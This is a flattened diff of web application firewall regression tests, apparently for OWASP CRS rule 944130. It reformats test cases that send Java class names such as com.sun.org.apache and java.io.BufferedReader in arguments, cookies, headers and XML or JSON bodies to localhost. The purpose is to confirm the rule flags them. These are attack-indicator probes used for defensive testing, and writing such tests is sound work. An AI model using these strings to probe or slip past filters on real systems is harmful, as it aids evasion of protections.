"application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"com.opensymphony.xwork2\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 12 desc: "Argument test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 13 desc: "Argument name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache=test" + output: + log: + expect_ids: [944130] + - test_id: 14 desc: "Cookie test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 15 desc: "Cookie name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: com.sun.org.apache=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.sun.org.apache=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 16 desc: "Request header test includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: com.sun.org.apache - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.sun.org.apache + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 17 desc: "XML attribute value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 18 desc: "XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 19 desc: "Nested XML element value includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 20 desc: "Content-Type text/plain includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=com.sun.org.apache" - output: - log_contains: "id \"944130\"" - - test_title: 944130-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=com.sun.org.apache" + output: + log: + expect_ids: [944130] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword 
com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"com.sun.org.apache\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"com.sun.org.apache\"}" + output: + log: + expect_ids: [944130] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword com.sun.org.apache" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"com.sun.org.apache\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: 
[944130] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
java.io.BufferedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
